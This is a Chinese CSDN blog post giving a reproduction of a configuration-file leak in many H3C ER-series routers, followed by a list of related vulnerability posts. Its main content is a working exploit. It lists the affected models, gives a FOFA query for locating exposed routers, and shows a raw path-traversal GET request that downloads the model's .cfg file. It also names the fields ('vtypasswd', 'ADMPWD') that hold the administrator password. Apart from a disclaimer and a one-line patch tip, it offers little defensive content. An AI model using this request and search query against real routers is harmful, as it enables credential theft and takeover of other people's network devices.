H3C路由器userLogin.asp信息泄漏漏洞-类型补充

已于 2024-08-06 10:25:57 修改
阅读量252 收藏 3
点赞数 3
文章标签: web安全
于 2024-08-06 10:20:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45100060/article/details/140947345
版权

H3C路由器userLogin.asp信息泄漏漏洞

免责申明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞概述

该漏洞为华三路由器(家用路由器)的漏洞,漏洞覆盖多种类型的家用路由器,很多师傅文章只提及一类,近期将遇到的类型补充如下,漏洞路径/userLogin.asp/../actionpolicy_status/../xxxxxxx.cfg 文件名为各个版本对应的型号名称

漏洞影响版本

    - ER2100V2
    - ER2100
    - ER2200G2
    - ER3100G2
    - ER3100
    - ER3108GW
    - ER3108G
    - ER3200G2
    - ER3200
    - ER3260G2
    - ER5100G2
    - ER5100
    - ER5200G2
    - ER5200
    - ER6300G2
    - ER8300G2-X
    - ER8300G2

网络资产测绘

fofa:app=“H3C-Ent-Router”

漏洞复现步骤

部分路由器型号中,获取密码位置为"vtypasswd",还有部分密码位置为"ADMPWD"

GET /userLogin.asp/../actionpolicy_status/../ER5200.cfg HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

在这里插入图片描述

修复建议

关注厂商官方最新补丁包

写完发现有师傅已经列举过资产类别,可以参考
https://blog.csdn.net/weixin_41924764/article/details/139730069

想创造贾维斯
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】H3C 路由器多系列信息泄露漏洞
晚风不及你
02-19 2253
H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 559
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
nglj9527的博客
05-22 841
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码。
漏洞复现】华三 H3C路由器 userLogin.asp 信息泄漏漏洞
凝聚力安全团队
06-17 1526
H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 3022
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
H3C ER G2系列路由器信息泄露漏洞
weixin_44304678的博客
12-15 1355
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。该系列版本设备存在信息泄露漏洞,攻击者可通过该漏洞读取服务器敏感信息。仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。vtypasswd就是密码。
H3C ER G2系列路由器敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-20 2045
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
最需要了解的H3C交换机端口安全模式
10-01
H3C交换机的端口安全模式是网络管理员在控制用户网络访问权限时的重要工具。这一功能类似于Cisco交换机的端口安全,但H3C提供了更为强大的选项。端口安全模式主要分为两类:控制MAC地址学习类和认证类。 控制MAC...
ssm-UserLogin.zip
12-25
在"ssm-UserLogin.zip"这个项目中,我们可以推测这是实现用户登录功能的一个小型示例。通常,项目会包含以下组成部分: 1. **配置文件**:如`applicationContext.xml`用于配置Spring Bean,`springmvc-dispatcher-...
UserLogin.java
05-23
UserLogin.java
UserLogin.xaml.cs
02-14
UserLogin.xaml.cs
JSP_userlogin.rar_ JSP_userlogin_JSP_userlogin_jsp login_jsp 登录
09-23
JSP实现用户登录的模块代码 操作步骤: 1.附加数据库 附加D:\tomcat5.0\webapps\chap09目录下的login.mdf数据库文件。然后在表中输入用户名:1,密码:1 2.运行 启动Tomcat,然后在浏览器中输入...
CVE-2024-32238 H3C-密码泄露
OrangeFox__111的博客
07-24 384
H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。app="H3C-Ent-Router" && title=="ER8300G2-X系统管理。返回包中存在有vtypasswd参数,告诉了我们登录的密码。修复建议:升级到最新版本。CVE-2024-32238 H3C-密码泄露漏洞复现
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 265
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 126
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
网络协议八 网络安全相关
hunandede的博客
08-12 419
ARP欺骗的防护原理。
【网络安全】密码重置中毒实现账户接管
等风来
08-15 134
我输入了新密码,点击“重置密码”。然后,我被导航到登录页面,在那里我输入了电子邮件和新密码,最后成功登录了账户,说明此漏洞是有效的。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-16 707
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值